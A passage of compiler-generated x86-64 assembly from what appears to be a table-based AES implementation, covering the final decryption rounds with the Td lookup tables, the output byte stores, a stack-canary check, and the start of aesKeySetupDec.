movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -276(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -148(%rbp), %eax
xorl -212(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -144(%rbp), %eax
xorl -224(%rbp), %eax
movl %eax, -276(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -140(%rbp), %eax
xorl -220(%rbp), %eax
movl %eax, -280(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -136(%rbp), %eax
xorl -216(%rbp), %eax
movl %eax, -284(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -132(%rbp), %eax
xorl -212(%rbp), %eax
movl %eax, -288(%rbp)
movl -276(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -288(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -284(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -280(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -128(%rbp), %eax
xorl -224(%rbp), %eax
movl %eax, -260(%rbp)
movl -280(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -276(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -288(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -284(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -124(%rbp), %eax
xorl -220(%rbp), %eax
movl %eax, -264(%rbp)
movl -284(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -280(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -276(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -288(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -120(%rbp), %eax
xorl -216(%rbp), %eax
movl %eax, -268(%rbp)
movl -288(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -284(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -280(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -276(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -116(%rbp), %eax
xorl -212(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -112(%rbp), %eax
xorl -224(%rbp), %eax
movl %eax, -276(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -108(%rbp), %eax
xorl -220(%rbp), %eax
movl %eax, -280(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -104(%rbp), %eax
xorl -216(%rbp), %eax
movl %eax, -284(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -100(%rbp), %eax
xorl -212(%rbp), %eax
movl %eax, -288(%rbp)
movl -276(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -288(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -284(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -280(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -96(%rbp), %eax
xorl -224(%rbp), %eax
movl %eax, -260(%rbp)
movl -280(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -276(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -288(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -284(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -92(%rbp), %eax
xorl -220(%rbp), %eax
movl %eax, -264(%rbp)
movl -284(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -280(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -276(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -288(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -88(%rbp), %eax
xorl -216(%rbp), %eax
movl %eax, -268(%rbp)
movl -288(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -284(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -280(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -276(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -84(%rbp), %eax
xorl -212(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -80(%rbp), %eax
xorl -224(%rbp), %eax
movl %eax, -276(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -76(%rbp), %eax
xorl -220(%rbp), %eax
movl %eax, -280(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -72(%rbp), %eax
xorl -216(%rbp), %eax
movl %eax, -284(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -68(%rbp), %eax
xorl -212(%rbp), %eax
movl %eax, -288(%rbp)
movl -276(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -288(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -284(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -280(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -64(%rbp), %eax
xorl -224(%rbp), %eax
movl %eax, -260(%rbp)
movl -280(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -276(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -288(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -284(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -60(%rbp), %eax
xorl -220(%rbp), %eax
movl %eax, -264(%rbp)
movl -284(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -280(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -276(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -288(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -56(%rbp), %eax
xorl -216(%rbp), %eax
movl %eax, -268(%rbp)
movl -288(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -284(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -280(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -276(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -52(%rbp), %eax
xorl -212(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -48(%rbp), %eax
xorl -224(%rbp), %eax
movl %eax, -276(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -44(%rbp), %eax
xorl -220(%rbp), %eax
movl %eax, -280(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -40(%rbp), %eax
xorl -216(%rbp), %eax
movl %eax, -284(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -36(%rbp), %eax
xorl -212(%rbp), %eax
movl %eax, -288(%rbp)
movl -276(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $-16777216, %eax ## imm = 0xFF000000
movl -288(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $16711680, %ecx ## imm = 0xFF0000
xorl %ecx, %eax
movl -284(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $65280, %ecx ## imm = 0xFF00
xorl %ecx, %eax
movl -280(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
xorl %ecx, %eax
xorl -32(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -260(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, (%rax)
movl -260(%rbp), %eax
shrl $16, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 1(%rax)
movl -260(%rbp), %eax
shrl $8, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 2(%rax)
movl -260(%rbp), %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 3(%rax)
movl -280(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $-16777216, %eax ## imm = 0xFF000000
movl -276(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $16711680, %ecx ## imm = 0xFF0000
xorl %ecx, %eax
movl -288(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $65280, %ecx ## imm = 0xFF00
xorl %ecx, %eax
movl -284(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
xorl %ecx, %eax
xorl -28(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -264(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 4(%rax)
movl -264(%rbp), %eax
shrl $16, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 5(%rax)
movl -264(%rbp), %eax
shrl $8, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 6(%rax)
movl -264(%rbp), %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 7(%rax)
movl -284(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $-16777216, %eax ## imm = 0xFF000000
movl -280(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $16711680, %ecx ## imm = 0xFF0000
xorl %ecx, %eax
movl -276(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $65280, %ecx ## imm = 0xFF00
xorl %ecx, %eax
movl -288(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
xorl %ecx, %eax
xorl -24(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -268(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 8(%rax)
movl -268(%rbp), %eax
shrl $16, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 9(%rax)
movl -268(%rbp), %eax
shrl $8, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 10(%rax)
movl -268(%rbp), %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 11(%rax)
movl -288(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $-16777216, %eax ## imm = 0xFF000000
movl -284(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $16711680, %ecx ## imm = 0xFF0000
xorl %ecx, %eax
movl -280(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $65280, %ecx ## imm = 0xFF00
xorl %ecx, %eax
movl -276(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Td4(%rip), %rcx
movl (%rcx,%rdx,4), %ecx
andl $255, %ecx
xorl %ecx, %eax
xorl -20(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -272(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 12(%rax)
movl -272(%rbp), %eax
shrl $16, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 13(%rax)
movl -272(%rbp), %eax
shrl $8, %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 14(%rax)
movl -272(%rbp), %eax
movb %al, %cl
movq -256(%rbp), %rax
movb %cl, 15(%rax)
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB2_2
## %bb.1:
addq $288, %rsp ## imm = 0x120
popq %rbp
retq
LBB2_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function aesKeySetupDec
_aesKeySetupDec: ## @aesKeySetupDec
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rdi
movq -16(%rbp), %rsi
callq _aesKeySetupEnc
movl %eax, -20(%rbp)
movl $0, -24(%rbp)
movl -20(%rbp), %eax
shll $2, %eax
movl %eax, -28(%rbp)
LBB3_1: ## =>This Inner Loop Header: Depth=1
movl -24(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB3_4
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %eax
